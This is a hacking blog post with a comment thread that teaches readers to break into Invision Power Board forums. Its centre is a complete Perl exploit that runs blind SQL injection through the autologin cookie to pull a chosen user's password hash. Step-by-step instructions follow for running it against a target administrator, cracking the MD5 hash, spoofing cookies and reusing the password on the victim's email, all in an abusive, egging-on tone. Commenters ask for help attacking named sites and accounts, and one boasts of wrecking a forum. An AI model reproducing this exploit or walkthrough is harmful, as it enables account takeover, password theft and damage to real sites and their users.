How to Hack into forums
This is what you like to call “Hacking a forum”.
I call it “Cracking into a forum” … Learn what hacking means you lazy fucks, lol…
PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.
So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:
CODE
#!/usr/bin/perl -w
################################################## ################
# This one actually works http://www.quantriweb.com/forum/images/smilies/smile.gif Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com (http://remusomega.com/)
################################################## ################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(”Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org/) [id] [ver 1/2].\n\n”;
exit;
}
my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);
my $outputs = ”;
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ?
“99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*” :
“99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*”;
my @cookie = (’Cookie’ => $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}
}
if ( length($outputs) < 1 ) { print “Not Exploitable!\n”; exit; }
}
print “Cookie: ” . $cpre . “member_id=” . $user . “;” . $cpre . “pass_hash=” . $outputs;
exit;
What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.
How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.
Your going to want to go and get ActivePerl. I am sure it’s here somewhere in Appz.
Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting “OK”.
So now you have Perl installed. Open up “My Computer”, and then click on “Local Disk (C:/)”. In there, you should see a folder named “Perl”. Open up that folder, and within “Perl”, you should see another folder named “bin”. Open up “bin”. Now that your in, drag and drop “ipb.pl” from your desktop, into “bin”.
Alrighty. Now everything is fine, and you’re ready to Pwn some FAGS …
What your going to want to do now, is open up your command prompt. If you don’t know how, please quit this site, and die…. Start – Run – CMD
Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:
cd C:\Perl\bin
Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:
perl ipb.pl
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace “http://hackingsite.com/forum” with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don’t be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.
Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f
But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person’s password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash’s before continuing reading.
Done? You understand the very basics of MD5s? Good. You’re probably thinking: I just read that MD5 hashes cannot be cracked!
LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.
There are many places online where you can enter hashes to be cracked. Personally, I use “Cain & Able”, which is a great MD5 cracker availiable at ‘http://odix.it’.
You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.
CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, fuck them up
But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?
Well, you can spoof your cookie!
If you would like to learn more on spoofing cookies, use the friendly searching site they call “GOOGLE”
Good luck!
Popularity: 7% [?]
Related posts:
- Create a CookieLogger and Hack any Account
- How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)
- Here is the Best way to Crack the BIOS password
- How to Hack Into a Windows XP Computer Without Changing Password
- Fastest Way to Hack into Others System
- How To Hack Geocities Webpages
- Cracking .htaccess/.htpasswd for Passwords
- School Network Hacking
Enjoyed this article? Subscribe to Hacking Truths and get daily updates about new cool websites and programs in your email for free.
Get Kaspersky Anti-Virus 2009
Hello Everybody
Just wanted to share my new experience.
If your Windows XP denies to run due to an error corresponding to lost HAL.DLL, invalid Boot.ini or any other critical system boot files you can fix this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then launch “attrib -H -R -S” on the C:\Boot.ini file and remove it. Launch “Bootcfg /Rebuild” and then Fixboot
Cheers,
Carl
what is the ipb.pl file and where is it?
the ipb.pl file is the code that you pasted into notepad. make sure that you save the file as ipb.pl
Okay, you lost me after the administrator step. Seriously, haha, I have no idea what all that code information was all about or how to access my cookies and all that jazz. Maybe I’m just a ‘noob’, but I honestly don’t know what to do.
oh yah baby i hacked a forum , fucked it up and then got banned . LOL!!!
they r now fucking restoring their stuff HAHAAH!!! thanx dude!!
Hi people,
I am new to this forum http://www.hungry-hackers.com and hope that anybody can
help me with the forex – I am looking for an introduction
for beginners. I have already some knowledge about shares. (Hope “How to Hack into forums” is the fitting category.)
I have the big hope that the recent turbulences in the forex exchange promise
quick and easy money not only for the experts. Any help is so much appreciated.
Thanks,
Max
I need to know how to get into sprints forem to change finacle information on my account. The back door to there system is Nviev.Nextel.com/Nview but it wont work on my computer system. I know they work off of Ensemble but dont know how to access it. Please help if u can>
Getting this error when running “perl ipb.pl” at CMD (C:\Perl\bin)…
“use” not allowed in expression ipb.pl line 10, at end of line
syntax error at ipb.pl line 10, near “use LWP:UserAgent”
Unrecognized character \x1D in column 12 at ipb.pl line 13.
What am I doing wrong?
Hi, just registered today, can someone give me some suggestions on which ebooks or guides are good for newbies like me?
Hacking Truths has joined forces with TradePub.com to offer you a new, exciting, and entirely free professional resource. Visit http://www.hungry-hackers.tradepub.com today to browse our selection of complimentary Industry magazines, white papers, webinars, podcasts, and more across 34 industry sectors. No credit cards, coupons, or promo codes required.
Yea I get the same error as Prey.
same here , looks like the code is somehow old the site that made this shit doesnt even work anymore
Hi Guys,
i’m really enjoying the forum so, excuse my bad english
cheers
http://www.squidoo.com/firstchoicepharmacy
exploit jpeg…
Maybe, but I’m not sure it’for everyone….
damn it i dont have any CLUE!!! please any make a step by step guide
THX
Hello All,
I am new here and just wanted to introduc myself.
I have a few questions but I will first search for the answers before asking them just in case they have been asnwered.
THanks!
Hi everybody, just joined today.
Hello to ya all!
Hello…
Prey said:
Getting this error when running “perl ipb.pl” at CMD (C:\Perl\bin)…
“use” not allowed in expression ipb.pl line 10, at end of line
syntax error at ipb.pl line 10, near “use LWP:UserAgent”
Unrecognized character \x1D in column 12 at ipb.pl line 13.
What am I doing wrong?
I have got the same problem, any help pls?
Excellent site http://www.hungry-hackers.com and I am really pleased to see you have what I am actually looking for here and this this post is exactly what I am interested in. It’s taken me literally 2 hours and 07 minutes of searching the web to find you (just kidding!) so I shall be pleased to become a regular visitor
gud bt u didnt give the 1.3.1 forum
Hello! I was trying to find a FAQ page but I couldn’t. Can you show it to me please
Hope everyone is doing excellent today
Excited to be here!
wow exellent
ive been searching for ages how to do this
I hope there’s good info here
Can anyone tell me their opinion of the forum thus far.
Looking to meet new people to exchange info with,so leave me your name
Bye,
HEy can u help me hack this site. http://www.phunland.com/forum/index.php i want to hack the main mod his id i think is 32 plz do tis for me contact. Rhett-97@hotmail.com
Oh wait sorry his username is link007
You made a point of differentiating yourself from a hacker, and then use that very term over and over. Jesus.
Prey said:
Getting this error when running “perl ipb.pl” at CMD (C:\Perl\bin)…
“use” not allowed in expression ipb.pl line 10, at end of line
syntax error at ipb.pl line 10, near “use LWP:UserAgent”
Unrecognized character \x1D in column 12 at ipb.pl line 13.
What am I doing wrong?
I have got the same problem, any help pls?
Hey All, it’s always nice to meet new people..Just wanted to introduce my self as new comer into the forum and for you all please feel free to ad me to your buddy list
this is good. ive done it . ppl can add me for better explainations and buyings , my id is h4ck_44@yahoo.com
Hey i just wanted to say hi to everyone.
something is wrong with the code
it saying this
Unrecognized character \x1D in column 12 at ipb.pl line 13
Note : If you have any Query related to the above Article please Post it to the Support Forum.
Leave your response!
Popular
Recent Post
Categories
Free SMS Alerts
For Indian Users
Send START HACKING <cityname> to 575758
* for more info click here
Subscribe
Free Email Updates
Sponsered Links
Most Commented
Categories
Archives
Introducing Myself
Blogroll
Translator